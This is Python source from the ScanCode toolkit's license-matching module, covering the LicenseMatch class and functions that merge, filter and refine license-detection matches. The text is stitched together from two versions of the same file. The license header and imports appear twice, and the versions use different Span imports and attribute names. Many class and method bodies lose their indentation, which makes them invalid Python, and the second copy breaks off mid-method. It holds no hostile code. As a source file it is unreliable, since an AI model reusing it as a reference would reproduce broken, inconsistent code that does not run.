# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, division, print_function
from array import array
from functools import partial
from functools import total_ordering
from hashlib import md5
from itertools import chain
from itertools import groupby
import textwrap
from licensedcode import query
from licensedcode.whoosh_spans.spans import Span
from licensedcode import cache
from licensedcode import MAX_DIST
# Debug switches: each TRACE_* flag enables verbose logging for one stage of
# the matching pipeline. All off by default.
TRACE = False
TRACE_REPR = False
TRACE_REFINE = False
TRACE_REFINE_SMALL = False
TRACE_FILTER = False
TRACE_MERGE = False
TRACE_MERGE_TEXTS = False
def logger_debug(*args):
    # No-op placeholder; replaced by a real implementation when TRACE is on.
    pass


if TRACE:
    import logging
    import sys

    logger = logging.getLogger(__name__)

    def logger_debug(*args):
        # Join all arguments into one message, stringifying non-strings
        # (`basestring` check: this module is Python 2-era code).
        return logger.debug(' '.join(
            isinstance(a, basestring) and a or repr(a) for a in args))

    logging.basicConfig(stream=sys.stdout)
    logger.setLevel(logging.DEBUG)
# When sorting matches for merging or refining, starts and lengths are divided
# by ROUNDING using integer division to bucket values into coarse bands.
ROUNDING = 10
# FIXME: Implement each ordering functions. From the Python docs: Note: While
# this decorator makes it easy to create well behaved totally ordered types, it
# does come at the cost of slower execution and more complex stack traces for
# the derived comparison methods. If performance benchmarking indicates this is
# a bottleneck for a given application, implementing all six rich comparison
# methods instead is likely to provide an easy speed boost.
@total_ordering
class LicenseMatch(object):
"""
License detection match to a rule with matched query positions and lines and
matched index positions. Also computes a score for match. At a high level, a
match behaves a bit like a Span and has several similar methods taking into
account both the query and index Span.
"""
__slots__ = 'rule', 'qspan', 'ispan', 'hispan', 'line_by_pos' , 'query_run_start', '_type'
def __init__(self, rule, qspan, ispan, hispan=None, line_by_pos=None, query_run_start=0, _type=''):
"""
Create a new match from:
- rule: matched Rule object
- qspan: query text matched Span, start at zero which is the absolute query start (not the query_run start).
- ispan: rule text matched Span, start at zero which is the rule start.
- hispan: rule text matched Span for high tokens, start at zero which is the rule start. Always a subset of ispan.
- line_by_pos: mapping of (query positions -> line numbers). Line numbers start at one.
Optional: if not provided, the `lines` start and end tuple will be (0, 0) and no line information will be available.
- _type: a string indicating which matching procedure this match was created with. Used for debugging and testing only.
Note the relationship between is the qspan and ispan is such that:
- they always have the exact same number of items but when sorted each value at an index may be different
- the nth position when sorted is such that the token value is equal
"""
self.rule = rule
self.qspan = qspan
self.ispan = ispan
if hispan is None:
hispan = Span()
self.hispan = hispan
self.line_by_pos = line_by_pos or {}
self.query_run_start = query_run_start
self._type = _type
def __repr__(self):
spans = ''
if TRACE_REPR:
qspan = self.qspan
ispan = self.ispan
spans = 'qspan=%(qspan)r, ispan=%(ispan)r, ' % locals()
rep = dict(
rule_id=self.rule.identifier,
rule_licenses=', '.join(sorted(self.rule.licenses)),
score=self.score(),
qlen=self.qlen(),
ilen=self.ilen(),
hilen=self.hilen(),
qreg=(self.qstart, self.qend),
spans=spans,
rlen=self.rule.length,
ireg=(self.istart, self.iend),
lines=self.lines,
_type=self._type,
)
return ('LicenseMatch<%(rule_id)r, %(rule_licenses)r, '
'score=%(score)r, qlen=%(qlen)r, ilen=%(ilen)r, hilen=%(hilen)r, rlen=%(rlen)r, '
'qreg=%(qreg)r, ireg=%(ireg)r, '
'%(spans)s'
'lines=%(lines)r, %(_type)r>') % rep
def __eq__(self, other):
"""
Strict equality.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan
)
def same(self, other):
"""
Return True if other has the same licensing, score and spans.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan)
def same_licensing(self, other):
"""
Return True if other has the same detected license keys.
"""
return self.rule.same_licensing(other.rule)
def __lt__(self, other):
return self.qstart < other.qstart
@property
def qstart(self):
return self.qspan.start
@property
def qend(self):
return self.qspan.end
def qlen(self):
"""
Return the length of the match as the number of matched query tokens.
"""
return len(self.qspan)
def qmagnitude(self):
return self.qspan.magnitude()
@property
def istart(self):
return self.ispan.start
@property
def iend(self):
return self.ispan.end
def ilen(self):
"""
Return the length of the match as the number of matched index tokens.
"""
return len(self.ispan)
def imagnitude(self):
return self.ispan.magnitude()
@property
def histart(self):
return self.hispan.start
@property
def hiend(self):
return self.hispan.end
def hilen(self):
"""
Return the length of the match as the number of matched query tokens.
"""
return len(self.hispan)
@property
def lines(self):
return self.line_by_pos.get(self.qstart, 0), self.line_by_pos.get(self.qend, 0)
def __contains__(self, other):
"""
Return True if every other qspan and ispan are contained in any self qspan.
"""
return self.contains_qspan(other) and self.contains_ispan(other)
def contains_qspan(self, other):
return other.qspan.issubset(self.qspan)
def contains_ispan(self, other):
return other.ispan.issubset(self.ispan)
def qdistance_to(self, other):
"""
Return the absolute qspan distance to other match.
Touching and overlapping matches have a zero distance.
"""
return self.qspan.distance_to(other.qspan)
def idistance_to(self, other):
"""
Return the absolute ispan distance from self to other match.
Touching and overlapping matches have a zero distance.
"""
return self.ispan.distance_to(other.ispan)
def qoverlap(self, other):
return self.qspan.overlap(other.qspan)
def ioverlap(self, other):
return self.ispan.overlap(other.ispan)
def overlap(self, other):
"""
Return True if this match spans both overlap with other match spans.
"""
return self.qoverlap(other) and self.ioverlap(other)
def qtouch(self, other):
return self.qspan.touch(other.qspan)
def itouch(self, other):
return self.ispan.touch(other.ispan)
def touch(self, other):
"""
Return True if this match spans both touch other match spans.
"""
return self.qtouch(other) and self.itouch(other)
def qsurround(self, other):
return self.qspan.surround(other.qspan)
def isurround(self, other):
return self.ispan.surround(other.ispan)
def is_qafter(self, other):
return self.qspan.is_after(other.qspan)
def is_iafter(self, other):
return self.ispan.is_after(other.ispan)
def is_after(self, other):
"""
Return True if this match spans are strictly after other match spans.
"""
return self.is_qafter(other) and self.is_iafter(other)
def subtract(self, other):
"""
Subtract an other match from this match by removing overlapping span
items present in both matches from this match.
"""
self.qspan.difference_update(other.qspan)
self.ispan.difference_update(other.ispan)
return self
@staticmethod
def merge(matches, max_dist=MAX_DIST):
"""
Merge overlapping, touching or close-by matches in the given iterable of
matches. Return a new list of merged matches if they can be merged.
Matches that cannot be merged are returned as-is.
Only matches for the same rules can be merged.
The overlap and touch is considered using both the qspan and ispan.
The maximal merge is always returned and eventually a single match per
rule is returned if all matches for that rule can be merged.
For being merged two matches must also be in increasing query and index positions.
"""
# FIXME: longer and denser matches starting at the same qspan should
# be sorted first
# only merge matches with the same licensing_identifier
# iterate on matches grouped by licensing_identifier, one licensing_identifier at a time.
# we divide by ROUNDING with an intergerb division to round values in coarse bands
sorter = lambda m: (m.rule.licensing_identifier, m.qspan.start , -m.qlen(), -m.ilen())
matches = sorted(matches, key=sorter)
merged = []
for _rid, rule_matches in groupby(matches, key=lambda m: m.rule.licensing_identifier):
rule_matches = list(rule_matches)
i = 0
if TRACE_MERGE:
logger_debug('merge_match: processing rule:', rule_matches[0].rule.identifier)
# compare two matches in the sorted sequence: current_match and the next one
while i < len(rule_matches) - 1:
current_match = rule_matches[i]
j = i + 1
if TRACE_MERGE: logger_debug('merge_match: current_match:', current_match)
while j < len(rule_matches):
next_match = rule_matches[j]
if TRACE_MERGE: logger_debug(' merge_match: next_match:', next_match)
if next_match.qdistance_to(current_match) >= max_dist or next_match.idistance_to(current_match) >= max_dist:
break
# remove surrounded matches
if current_match.qsurround(next_match):
# current_match.update(next_match)
if TRACE_MERGE: logger_debug(' ==> NEW MERGED 1:', current_match)
if TRACE_MERGE_TEXTS: print('MERGE ==> surround:\n',
current_match, '\n', get_match_itext(current_match),
'\nnext:\n', get_match_itext(next_match))
del rule_matches[j]
# next_match is strictly in increasing sequence and within distance
# and same rule
elif (next_match.is_after(current_match)
and current_match.rule == next_match.rule
and next_match.qdistance_to(current_match) < max_dist
and next_match.idistance_to(current_match) < max_dist):
current_match.update(next_match)
if TRACE_MERGE: logger_debug(' ==> NEW MERGED 2:', current_match)
if TRACE_MERGE_TEXTS: print('MERGE ==> increasing within dist\n',
current_match, '\n', get_match_itext(current_match),
'\nnext:\n', get_match_itext(next_match))
del rule_matches[j]
else:
j += 1
i += 1
merged.extend(rule_matches)
return merged
def combine(self, other):
"""
Return a new match combining self and an other match.
"""
same_rule = self.rule == other.rule
# FIXME: we may be combining apples and oranges by considering same licensing too!
same_licensing = self.same_licensing(other)
if not (same_rule or same_licensing):
raise TypeError('Cannot combine matches with different rules or licensing: from: %(self)r, to: %(other)r' % locals())
if other._type not in self._type:
new_type = ' '.join([self._type, other._type])
else:
new_type = self._type
line_by_pos = dict(self.line_by_pos)
line_by_pos.update(other.line_by_pos)
combined = LicenseMatch(rule=self.rule,
qspan=Span(self.qspan | other.qspan),
ispan=Span(self.ispan | other.ispan),
hispan=Span(self.hispan | other.hispan),
line_by_pos=line_by_pos,
query_run_start=min(self.query_run_start, other.query_run_start),
_type=new_type)
return combined
def update(self, other):
"""
Update self with other match and return self.
"""
combined = self.combine(other)
self.qspan = combined.qspan
self.ispan = combined.ispan
self.hispan = combined.hispan
self.line_by_pos = combined.line_by_pos
self._type = combined._type
self.query_run_start = min(self.query_run_start, other.query_run_start)
return self
def rebase(self, new_query_start, new_query_end, line_by_pos, _type):
"""
Return a copy of this match with a new qspan and new line_by_pos and
updating the _type of match as needed.
"""
return LicenseMatch(
rule=self.rule,
qspan=Span(new_query_start, new_query_end),
ispan=Span(self.ispan),
hispan=Span(self.hispan),
line_by_pos=line_by_pos,
query_run_start=new_query_start,
_type=' '.join([self._type.replace(cache.MATCH_TYPE, '').strip(), _type]),
)
def score(self):
"""
Return the score for this match as a float between 0 and 100.
This is a ratio of matched tokens to the rule length.
"""
# TODO: compute a better score based tf/idf, BM25, applying ratio to low tokens, etc
if not self.rule.length:
return 0
score = self.ilen() / self.rule.length
return round(score * 100, 2)
def small(self):
"""
Return True if this match is "small" based on its rule thresholds.
"""
thresholds = self.rule.thresholds()
min_ihigh = thresholds.min_high
min_ilen = thresholds.min_len
hilen = self.hilen()
ilen = self.ilen()
if TRACE_REFINE_SMALL:
logger_debug('LicenseMatch.small(): hilen=%(hilen)r < min_ihigh=%(min_ihigh)r or ilen=%(ilen)r < min_ilen=%(min_ilen)r : thresholds=%(thresholds)r' % locals(),)
if thresholds.small and self.score() < 50 and (hilen < min_ihigh or ilen < min_ilen):
return True
if hilen < min_ihigh and ilen < min_ilen:
return True
    def false_positive(self, idx):
        """
        Return a false positive rule id if the LicenseMatch match is a false
        positive or None otherwise (nb: not False).
        Lookup the matched tokens sequence against the idx index.
        """
        ilen = self.ilen()
        # false positive rules are short: bail out early on longer matches
        if ilen > idx.largest_false_positive_length:
            return
        rule_tokens = idx.tids_by_rid[self.rule.rid]
        ispan = self.ispan
        matched_itokens = array('h', (tid for ipos, tid in enumerate(rule_tokens) if ipos in ispan))
        # note: hash computation is inlined here but MUST be the same code as in match_hash
        # NOTE(review): array.tostring() is the Python 2 spelling; it was
        # removed in Python 3.9 in favor of tobytes() — revisit on a port.
        matched_hash = md5(matched_itokens.tostring()).digest()
        return idx.false_positive_rid_by_hash.get(matched_hash)
def filter_matches(matches):
    """
    Return a filtered list of LicenseMatch given a `matches` list of
    LicenseMatch by removing duplicated or superfluous matches based on matched
    positions relation such as sequence, containment, touch, overlap, same
    licensing.
    Matches that are entirely contained in another bigger match are removed.
    When more than one matched position matches the same license(s), only one
    match of this set is kept.
    Return a two-tuple of (kept matches, discarded matches) lists.
    """
    # sort by coarse start band, then longer and denser matches first
    matches = sorted(matches, key=lambda m: (m.qstart // ROUNDING, -m.qlen(), -m.ilen()))
    if TRACE_FILTER: print('filter_matches: number of matches to process:', len(matches))
    discarded = []
    # compare two matches in the sorted sequence: current_match and the next one
    i = 0
    while i < len(matches) - 1:
        current_match = matches[i]
        j = i + 1
        while j < len(matches):
            next_match = matches[j]
            if TRACE_FILTER: print('filter_match: current_match:', current_match)
            if TRACE_FILTER: print(' filter_match: next_match:', next_match)
            # Skip qcontained, irrespective of licensing
            # FIXME: by construction this CANNOT happen
            if current_match.contains_qspan(next_match):
                if TRACE_FILTER: print(' filter_matches: next_match in current_match')
                del matches[j]
                continue
            if current_match.qsurround(next_match):
                # Skip if next match is surrounded and has same of licensing
                if current_match.same_licensing(next_match):
                    if TRACE_FILTER: print(' filter_matches: next_match in current_match region and same licensing')
                    del matches[j]
                    continue
                if current_match.qlen() > (next_match.qlen() * 2):
                    # Skip if next match is surrounded and is much smaller than current
                    if TRACE_FILTER: print(' filter_matches: remove surrounding with much bigger match')
                    del matches[j]
                    continue
            # the next_match has some region overlap
            if current_match.qstart < next_match.qstart and current_match.qend < next_match.qend:
                # compute region overlap
                overlapping = [p for p in next_match.qspan if p < current_match.qend]
                overlap = len(overlapping)
                # over 50 % of overlap: discard
                if overlap > (len(next_match.qspan) / 2):
                    if TRACE_FILTER: print(' filter_matches: remove partially overlapping with much bigger match')
                    # NOTE(review): this assignment looks like a no-op since
                    # current_match was read from matches[i] and i is unchanged
                    matches[i] = current_match
                    discarded.append(matches[j])
                    del matches[j]
                    continue
            j += 1
        i += 1
    # FIXME: returned discarded too
    return matches, discarded
def filter_low_score(matches, min_score=100):
    """
    Return a two-tuple of (kept, discarded) lists of matches where kept
    matches score at least `min_score`. With a zero or falsy `min_score`
    everything is kept and nothing is discarded.
    """
    if not min_score:
        return matches, []
    kept = [m for m in matches if m.score() >= min_score]
    discarded = [m for m in matches if m.score() < min_score]
    return kept, discarded
def filter_short_matches(matches):
    """
    Return a two-tuple of (kept, discarded) lists of matches where the
    discarded matches are "small" per their rule thresholds.
    """
    kept = []
    discarded = []
    for candidate in matches:
        if not candidate.small():
            if TRACE_REFINE_SMALL: logger_debug(' ===> NOT DISCARDING SHORT:', candidate)
            kept.append(candidate)
        else:
            if TRACE_REFINE_SMALL: logger_debug('DISCARDING SHORT:', candidate)
            discarded.append(candidate)
    return kept, discarded
def filter_spurious_matches(matches):
    """
    Return a two-tuple of (kept, discarded) lists of matches where the
    discarded matches are spurious: short, with few "high" tokens and a
    sparse (low density) qspan or ispan.
    """
    kept = []
    discarded = []
    for candidate in matches:
        sparse = candidate.qspan.density() < 0.3 or candidate.ispan.density() < 0.3
        if candidate.ilen() < 20 and candidate.hilen() < 5 and sparse:
            if TRACE_REFINE: logger_debug('DISCARDING Spurrious:', candidate)
            discarded.append(candidate)
        else:
            kept.append(candidate)
    return kept, discarded
def filter_false_positive_matches(idx, matches):
    """
    Return a two-tuple of (kept, discarded) lists of matches where the
    discarded matches are known false positives in the `idx` index.
    """
    kept = []
    discarded = []
    for candidate in matches:
        fp_rid = candidate.false_positive(idx)
        if fp_rid is not None:
            if TRACE_REFINE: logger_debug('DISCARDING FALSE POSITIVE:', candidate, 'fp rule:', idx.rules_by_rid[fp_rid].identifier)
            discarded.append(candidate)
        else:
            if TRACE_REFINE: logger_debug('NOT DISCARDING FALSE POSITIVE:', candidate)
            kept.append(candidate)
    return kept, discarded
def refine_matches(matches, idx, min_score=0, max_dist=MAX_DIST):
    """
    Return two sequences of matches: one contains refined good matches, and the
    other contains matches that were filtered out.

    Discard small, false positive, spurious and (when `min_score` is set)
    low-scoring matches; merge the survivors when they are within `max_dist`
    of each other.
    """
    if TRACE: logger_debug()
    if TRACE: logger_debug(' #####refine_matches: START matches#', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    all_discarded = []
    matches, discarded = filter_short_matches(matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' #####refine_matches: NOT SHORT #', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: SHORT discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    matches, discarded = filter_false_positive_matches(idx, matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' #####refine_matches: NOT FALSE POS #', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: FALSE POS discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    matches, discarded = filter_spurious_matches(matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' #####refine_matches: NOT SPURIOUS#', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: SPURIOUS discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    # FIX: honor the `max_dist` argument: it was accepted but ignored, with
    # both merge calls hardcoding MAX_DIST
    matches = LicenseMatch.merge(matches, max_dist=max_dist)
    # FIX: guard debug logging with TRACE like every other call in here
    if TRACE: logger_debug(' ##### refine_matches: MERGED_matches#:', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    matches, discarded = filter_matches(matches)
    all_discarded.extend(discarded)
    if TRACE: logger_debug(' ##### refine_matches: NOT FILTERED matches#:', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    if TRACE: logger_debug(' #####refine_matches: FILTERED discarded#', len(discarded))
    if TRACE_REFINE: map(logger_debug, discarded)
    if min_score:
        matches, discarded = filter_low_score(matches, min_score=min_score)
        all_discarded.extend(discarded)
        if TRACE: logger_debug(' #####refine_matches: NOT LOW SCORE #', len(matches))
        if TRACE_REFINE: map(logger_debug, matches)
        if TRACE: logger_debug(' ###refine_matches: LOW SCORE discarded #:', len(discarded))
        if TRACE_REFINE: map(logger_debug, discarded)
    matches = LicenseMatch.merge(matches, max_dist=max_dist)
    if TRACE: logger_debug(' ##### refine_matches: FINAL MERGED_matches#:', len(matches))
    if TRACE_REFINE: map(logger_debug, matches)
    return matches, all_discarded
def get_texts(match, location=None, query_string=None, idx=None, width=120):
    """
    Return a two-tuple of (matched query text, matched rule text) strings for
    `match`, given a query file `location` or a `query_string` and an `idx`
    index. Texts are wrapped at `width` when width is non-zero.
    Used primarily to recover the matched texts for testing or reporting.
    Unmatched positions are represented as <no-match>, rule gaps as <gap>.
    Punctuation is removed, spaces are normalized (new line is replaced by a
    space), case is preserved.
    """
    assert idx
    qtext = get_matched_qtext(match, location, query_string, idx, width)
    itext = get_match_itext(match, width)
    return qtext, itext
def get_matched_qtext(match, location=None, query_string=None, idx=None, width=120):
    """
    Return the matched query text as a string wrapped at `width` given a
    match, a query file `location` or a `query_string`, and an `idx` index.
    Used primarily to recover the matched texts for testing or reporting.
    Unmatched positions are represented as <no-match>.
    Punctuation is removed, spaces are normalized (new line is replaced by a
    space), case is preserved.
    """
    assert idx
    return format_text(matched_query_tokens_str(match, location, query_string, idx), width)
def get_match_itext(match, width=120):
    """
    Return the matched rule text as a string wrapped at `width` given a match.
    Used primarily to recover the matched texts for testing or reporting.
    Unmatched positions inside a matched region are represented as <no-match>
    and rule gaps as <gap>.
    Punctuation is removed, spaces are normalized (new line is replaced by a
    space), case is preserved.
    """
    rule_tokens = matched_rule_tokens_str(match)
    return format_text(rule_tokens, width)
def format_text(tokens, width=120, no_match='<no-match>'):
    """
    Return a formatted text wrapped at `width` given an iterable of tokens.
    None (or otherwise falsy) tokens for unmatched positions are replaced
    with the `no_match` marker. With a zero/falsy width no wrapping is done.
    """
    filled = (tok if tok else no_match for tok in tokens)
    text = u' '.join(filled)
    if not width:
        return text
    return u'\n'.join(textwrap.wrap(text, width=width, break_on_hyphens=False))
def matched_query_tokens_str(match, location=None, query_string=None, idx=None):
    """
    Return an iterable of matched query token strings given a query file at
    `location` or a `query_string`, a match and an index. Yield None for
    unmatched positions.
    Punctuation is removed , spaces are normalized (new line is replaced by a
    space), case is preserved.
    Used primarily to recover the matched texts for testing or reporting.
    """
    assert idx
    dictionary_get = idx.dictionary.get
    # re-tokenize the query the same way as indexing does, but keep the case
    tokens = (query.query_tokenizer(line, lower=False)
              for line in query.query_lines(location, query_string))
    tokens = chain.from_iterable(tokens)
    match_qspan = match.qspan
    match_qspan_start = match_qspan.start
    match_qspan_end = match_qspan.end
    # known_pos counts only tokens known to the index: unknown tokens do not
    # occupy positions in a match qspan
    known_pos = -1
    started = False
    finished = False
    for token in tokens:
        token_id = dictionary_get(token.lower())
        if token_id is None:
            # unknown token: skip it before the matched region starts and
            # stop the scan once the region is finished
            if not started:
                continue
            if finished:
                break
        else:
            known_pos += 1
            if match_qspan_start <= known_pos <= match_qspan_end:
                started = True
                if known_pos == match_qspan_end:
                    finished = True
        # emit the token when its position is matched, None otherwise
        if known_pos in match_qspan and token_id is not None:
            yield token
        else:
            yield None
def matched_rule_tokens_str(match, gap='<gap>'):
    """
    Return an iterable of matched rule token strings given a match. Yield None
    for unmatched positions. Yield the `gap` string to represent a gap.
    Punctuation is removed , spaces are normalized (new line is replaced by a
    space), case is preserved.
    Used primarily to recover the matched texts for testing or reporting.
    """
    span = match.ispan
    gaps = match.rule.gaps
    for pos, token in enumerate(match.rule.tokens(lower=False)):
        # only emit positions inside the matched region of the rule
        if span.start <= pos <= span.end:
            tok = None
            if pos in span:
                tok = token
            yield tok
            # emit a gap marker after any rule position flagged as a gap
            if gaps and pos in gaps:
                yield gap
# Changelog note (#86): correctly rebase cache matches;
# also use matcher instead of _type;
# refine filtering and merging.
#
# Copyright (c) 2016 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import, division, print_function
from array import array
from functools import partial
from functools import total_ordering
from hashlib import md5
from itertools import chain
from itertools import groupby
import textwrap
from licensedcode import query
from licensedcode.spans import Span
from licensedcode import cache
from licensedcode import MAX_DIST
"""
LicenseMatch data structure and matches merging and filtering routines.
"""
TRACE = False
TRACE_REPR = False
TRACE_REFINE = False
TRACE_REFINE_SMALL = False
TRACE_FILTER = False
TRACE_MERGE = False
TRACE_MERGE_TEXTS = False
def logger_debug(*args): pass
if TRACE:
import logging
import sys
logger = logging.getLogger(__name__)
def logger_debug(*args):
return logger.debug(' '.join(isinstance(a, basestring) and a or repr(a) for a in args))
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
# When soring matches for merging or refining, we divide starts and length by
# ROUNDING with an intergerb division to round values in coarse bands
ROUNDING = 10
# FIXME: Implement each ordering functions. From the Python docs: Note: While
# this decorator makes it easy to create well behaved totally ordered types, it
# does come at the cost of slower execution and more complex stack traces for
# the derived comparison methods. If performance benchmarking indicates this is
# a bottleneck for a given application, implementing all six rich comparison
# methods instead is likely to provide an easy speed boost.
@total_ordering
class LicenseMatch(object):
    """
    License detection match to a rule with matched query positions and lines and
    matched index positions. Also computes a score for match. At a high level, a
    match behaves a bit like a Span and has several similar methods taking into
    account both the query and index Span.
    """
    # slotted: many matches are created, keep per-instance memory low
    __slots__ = 'rule', 'qspan', 'ispan', 'hispan', 'line_by_pos' , 'query_run_start', 'matcher'
    def __init__(self, rule, qspan, ispan, hispan=None, line_by_pos=None, query_run_start=0, matcher=''):
        """
        Create a new match from:
        - rule: matched Rule object
        - qspan: query text matched Span, start at zero which is the absolute query start (not the query_run start).
        - ispan: rule text matched Span, start at zero which is the rule start.
        - hispan: rule text matched Span for high tokens, start at zero which is the rule start. Always a subset of ispan.
        - line_by_pos: mapping of (query positions -> line numbers). Line numbers start at one.
        Optional: if not provided, the `lines` start and end tuple will be (0, 0) and no line information will be available.
        - matcher: a string indicating which matching procedure this match was created with. Used for debugging and testing only.
        Note the relationship between is the qspan and ispan is such that:
        - they always have the exact same number of items but when sorted each value at an index may be different
        - the nth position when sorted is such that the token value is equal
        """
        self.rule = rule
        self.qspan = qspan
        self.ispan = ispan
        # default to an empty Span: hispan is always a subset of ispan
        if hispan is None:
            hispan = Span()
        self.hispan = hispan
        self.line_by_pos = line_by_pos or {}
        self.query_run_start = query_run_start
        self.matcher = matcher
    def __repr__(self):
        """
        Return a compact debug representation with rule, licenses, score,
        lengths, regions, lines and matcher. The raw spans are included only
        when TRACE_REPR is enabled.
        """
        spans = ''
        if TRACE_REPR:
            qspan = self.qspan
            ispan = self.ispan
            spans = 'qspan=%(qspan)r, ispan=%(ispan)r, ' % locals()
        rep = dict(
            rule_id=self.rule.identifier,
            rule_licenses=', '.join(sorted(self.rule.licenses)),
            score=self.score(),
            qlen=self.qlen(),
            ilen=self.ilen(),
            hilen=self.hilen(),
            qreg=(self.qstart, self.qend),
            spans=spans,
            rlen=self.rule.length,
            ireg=(self.istart, self.iend),
            lines=self.lines,
            matcher=self.matcher,
        )
        return ('LicenseMatch<%(rule_id)r, %(rule_licenses)r, '
                'score=%(score)r, qlen=%(qlen)r, ilen=%(ilen)r, hilen=%(hilen)r, rlen=%(rlen)r, '
                'qreg=%(qreg)r, ireg=%(ireg)r, '
                '%(spans)s'
                'lines=%(lines)r, %(matcher)r>') % rep
    def __eq__(self, other):
        """
        Strict equality: same licensing and identical qspan and ispan.
        """
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable on Python 3 (fine on Python 2) — revisit on a port.
        return (isinstance(other, LicenseMatch)
            and self.same_licensing(other)
            and self.qspan == other.qspan
            and self.ispan == other.ispan
        )
def same(self, other):
"""
Return True if other has the same licensing, score and spans.
"""
return (isinstance(other, LicenseMatch)
and self.same_licensing(other)
and self.qspan == other.qspan
and self.ispan == other.ispan)
def same_licensing(self, other):
"""
Return True if other has the same detected license keys.
"""
return self.rule.same_licensing(other.rule)
    def __lt__(self, other):
        # order matches by their starting query position only; together with
        # __eq__, @total_ordering derives the remaining comparisons
        return self.qstart < other.qstart
    @property
    def qstart(self):
        # first matched query position
        return self.qspan.start
    @property
    def qend(self):
        # last matched query position
        return self.qspan.end
    def qlen(self):
        """
        Return the length of the match as the number of matched query tokens.
        """
        return len(self.qspan)
    def qmagnitude(self):
        # delegate to Span.magnitude() for the query span
        return self.qspan.magnitude()
    @property
    def istart(self):
        # first matched rule (index) position
        return self.ispan.start
    @property
    def iend(self):
        # last matched rule (index) position
        return self.ispan.end
    def ilen(self):
        """
        Return the length of the match as the number of matched index tokens.
        """
        return len(self.ispan)
    def imagnitude(self):
        # delegate to Span.magnitude() for the index span
        return self.ispan.magnitude()
    @property
    def histart(self):
        # first matched high-token rule position
        return self.hispan.start
    @property
    def hiend(self):
        # last matched high-token rule position
        return self.hispan.end
    def hilen(self):
        """
        Return the length of the match as the number of matched high index
        tokens.
        """
        return len(self.hispan)
    @property
    def lines(self):
        # (start line, end line) of this match in the query, 1-based;
        # (0, 0) when no line_by_pos mapping was provided
        return self.line_by_pos.get(self.qstart, 0), self.line_by_pos.get(self.qend, 0)
    def __contains__(self, other):
        """
        Return True if every other qspan and ispan are contained in any self qspan.
        """
        return self.contains_qspan(other) and self.contains_ispan(other)
    def contains_qspan(self, other):
        # True when other's matched query positions are a subset of ours
        return other.qspan.issubset(self.qspan)
    def contains_ispan(self, other):
        # True when other's matched index positions are a subset of ours
        return other.ispan.issubset(self.ispan)
    def qdistance_to(self, other):
        """
        Return the absolute qspan distance to other match.
        Touching and overlapping matches have a zero distance.
        """
        return self.qspan.distance_to(other.qspan)
    def idistance_to(self, other):
        """
        Return the absolute ispan distance from self to other match.
        Touching and overlapping matches have a zero distance.
        """
        return self.ispan.distance_to(other.ispan)
    def qoverlap(self, other):
        # delegate to Span.overlap for the query spans
        return self.qspan.overlap(other.qspan)
    def ioverlap(self, other):
        # delegate to Span.overlap for the index spans
        return self.ispan.overlap(other.ispan)
    def overlap(self, other):
        """
        Return True if this match spans both overlap with other match spans.
        """
        return self.qoverlap(other) and self.ioverlap(other)
    def qtouch(self, other):
        # delegate to Span.touch for the query spans
        return self.qspan.touch(other.qspan)
    def itouch(self, other):
        # delegate to Span.touch for the index spans
        return self.ispan.touch(other.ispan)
    def touch(self, other):
        """
        Return True if this match spans both touch other match spans.
        """
        return self.qtouch(other) and self.itouch(other)
    def qsurround(self, other):
        # delegate to Span.surround for the query spans
        return self.qspan.surround(other.qspan)
    def isurround(self, other):
        # delegate to Span.surround for the index spans
        return self.ispan.surround(other.ispan)
    def is_qafter(self, other):
        # delegate to Span.is_after for the query spans
        return self.qspan.is_after(other.qspan)
    def is_iafter(self, other):
        # delegate to Span.is_after for the index spans
